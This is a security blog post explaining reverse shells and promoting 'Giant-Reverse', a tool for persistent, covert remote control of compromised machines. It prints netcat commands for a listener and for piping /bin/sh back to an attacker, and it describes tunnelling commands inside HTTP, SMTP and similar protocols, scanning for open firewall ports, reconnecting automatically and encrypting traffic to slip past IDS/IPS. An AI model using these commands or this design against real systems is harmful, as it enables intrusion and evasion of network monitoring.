Securebits Blog

One of the most important stages after a successful exploitation of remote system is to maintain a persistent access to that compromised machine. A persistent access refers to the ability of the attacker to access the compromised system any time after the exploitation. In the past, installing a backdoor that listens on a particular port and accepts connections on that port was the preferred method to keep a persistent access. The attacker would simply have a remote shell to the system and have a full control over it. This technique has become less feasible with the advent of security measures; and with the wide deployment of firewalls that even the smallest corporate network has some sort of network access-control; inbound (incoming) connections are restricted by network administrators. Binding the remote system to a local port after a successful exploitation won’t give the attacker a persistent access anymore.

The trend in post-exploitation stage moved from “remote shell” to “reverse shell” where instead of the remote system listening on a particular port and waiting for an incoming connection, the remote system initiate a connection to the attacker machine, however, such connection is used by the attacker to send “shell” commands to the remote system to be executed. It is called “reverse” because the shell control runs in the opposite direction of the established connection. The connection is established from the remote compromised system to the attacker, while the control traffic (shell) is running from the attacker’s machine to the target machine. For “reverse-shell” to work, it is enough to have an outgoing open port on the firewall so that the compromised system initiates the outbound connection through this port.

There are various techniques to have a reverse-shell. An attacker who is exploiting a remote vulnerability that requires sending shellcode may construct a shellcode that establishes a connection back to his/her machine and pipes a shell to that stream. Also, the attacker can use an external program/script that provides this facility. SSH and Netcat are good candidate to do this job. Having a reverse-shell access using netcat can be done as follows: a netcat instance would run on the attacker’s machine; and another instance runs on the compromised machine. If the attacker wants to have the reverse-shell on port 2233, he runs netcat on his/her machine as follows:

     $netcat –v –l –p 2233

And on the compromised machine, he/she runs:

     $netcat –e /bin/sh  2233

However, there are many drawbacks to these current techniques. First, network security solutions, other than firewalls, are deployed by corporate networks. The main two are Application-level inspection engine and IPS/IDS. Application inspection engine monitors the traffic at the application level (e.g. FTP, HTTP, POP3, SMTP, NTP, etc) and filters any non-standard behavior. In other words, the inspection engine always makes sure that the application traffic is according to the standard RFC implementation. Otherwise, the connection is blocked. For example, an SMTP inspection engine ensures at least the following:

- The commands and responses are standard SMTP commands and responses.
- The SMTP transaction happens in the standard sequence.
- An SMTP command from the client must be acknowledged by the server before the client is able to send the next command.

The same applies to other protocol inspection engines, like HTTP, POP3, FTP, etc.

An IDS/IPS device extends the monitoring capability to an actual checking of standard traffic and making sure that variable fields do not contain malicious contents. For example, the username field in a POP3 protocol may contain any data. If an attacker embeds a username field to exploit remote buffer overflow vulnerability, the inspection engine will not detect this. However, the IDS/IPS may detect if it knows the signature of the shellcode.

Given these advancements in network security solutions, normal reverse-shell techniques become obsolete. A reverse-shell implemented with netcat or SSH does not comply with a pre-defined standard protocol implementation, and thus, it is easily detectable. Another drawback of the existing implementations is that they do not provide a reliable and maintainable access. If the connection is halted for some reasons, the attacker needs to re-establish it again manually.

The idea of “Next Generation Reverse Shell” was born to provide a reliable, maintainable, and persistent access to compromised systems and to stand within the modern advancements of security measures. A platform, called “Giant-Reverse”, is also developed to provide the facility of Next Gen. Reverse Shell. The characteristics and features of this new and original implementation are as follows:

[1] Next Gen. Reverse Shell utilizes standard protocols to tunnel shell commands and execution results. Protocols like HTTP, SMTP, POP3, FTP, NTP, and ICMP can be used to carry, and transfer arbitrary data without violating the standard implementation of these protocols. By utilizing such protocols, the traffic would not only pass through a network firewall, but also appear as a legitimate traffic in the eyes of an inspection engine or IDS/IPS.

[2] Next Gen. Reverse Shell has the ability to automatically detect the open ports on the firewall. When the client agent runs, it tries to connect to the server machine (controlled by the attacker) on various ports until it finds a port that is open. For example, it tries to connect to port 21 (FTP) and if this port is closed, it tries port 80 (HTTP) and if it is closed, it tries port 110 (POP3) and so on. This feature means that the attacker does not worry about finding the suitable open port on the firewall and instruct the client to use it; rather, the client finds it automatically.

[3] Next Gen. Reverse Shell provides the ability to run simultaneously multiple Shells over single stream. After establishing the reverse connection on a particular port, the specialist (e.g. security professional, attacker, etc) can create more than one shell over this single TCP or UDP stream; all the Shells are running concurrently and the specialist can swap between them. This provides greater control over the compromised system. The user can run a password sniffer in one shell, a password brute-force tool in another and a vulnerability scanner in a third shell.

[4] Next Gen. Reverse Shell provides the ability to control multiple compromised systems at once. The listening server running on the attacker’s machine can accepts connections from different client agents. The specialist, then, would control these clients simultaneously. He/she would run a program on the first client, then swap to a second one and run another program. At any time, the server can show details about the connected clients with some statistical data.

[5] Next Gen. Reverse Shell gives the user the ability to change the tunneling protocol and port number at any time. If there is a connection from a client to the server on port 21 with the FTP protocol, the user can change it to port 110 with POP3 protocol. After instructing the client to change protocol, the client halts the current connection and establishes a new one on the specified port.

[6] Next Gen. Reverse Shell has the ability to suspend the client agent for specific amount of time. When a client is suspended, the status of the running Shells remain the same; and when the period of suspension ends, the client re-establishes the connection again while preserving the Shell. For example, if the user is running two simultaneous Shells and would like to stop working and resume the work the next day, he/she would instruct the client to suspend for one day. During the suspension (or sleep) period, there is no traffic generated between the client and the server.

[7] Next Gen. Reverse Shell automatically re-establishes the connection in case of a disconnection. Just like the feature where the client automatically finds the open port, the client can automatically initiate new connection in case the previous one is lost. Let’s take this scenario; if the corporate network administrator reboots the firewall, all connections are lost. The attacker would then lose the current established reverse-shell connection. However, once the client detects such sudden disconnection, it re-establishes the connection again.

[8] Next Gen. Reverse Shell provides the ability to conceal the transferred shell commands or execution results by either encoding or encrypting these messages. This is different than SSH mechanism which encrypts the whole application layer. The encryption and encoding mechanism of Next Gen. Reverse Shell is to encrypt or encode only the contents tunneled within the normal standard protocols. For examples, if the user is utilizing SMTP protocol as a tunnel to transfer commands/results, the body of the messages are encrypted or encoded while the standard SMTP communication is neither encrypted nor encoded. Let’s say the attacker runs a command like “echo /etc/passwd”, the result of this command is transfer in plain-text. An administrator monitoring the traffic with his/her naked eye would see the content of /etc/passwd file being transferred. However, with encryption, or at least encoding, such traffic may pass unnoticed by the administrator.

[9] Next Gen. Reverse Shell distinguishes between different sets of commands. There is internal command set and shell command set. Internal commands are used by the user to control the behavior of the Next Gen. Reverse Shell application. Internal commands enable the user to set or get specific variable data. For example, the internal command “create_shell” instantiate a new shell on the remote machine, and a command like “set_protocol” sets the tunneling protocol. Any command other than internal commands is considered a shell command and would be executed on the remote machine; the results of such execution are returned to the user.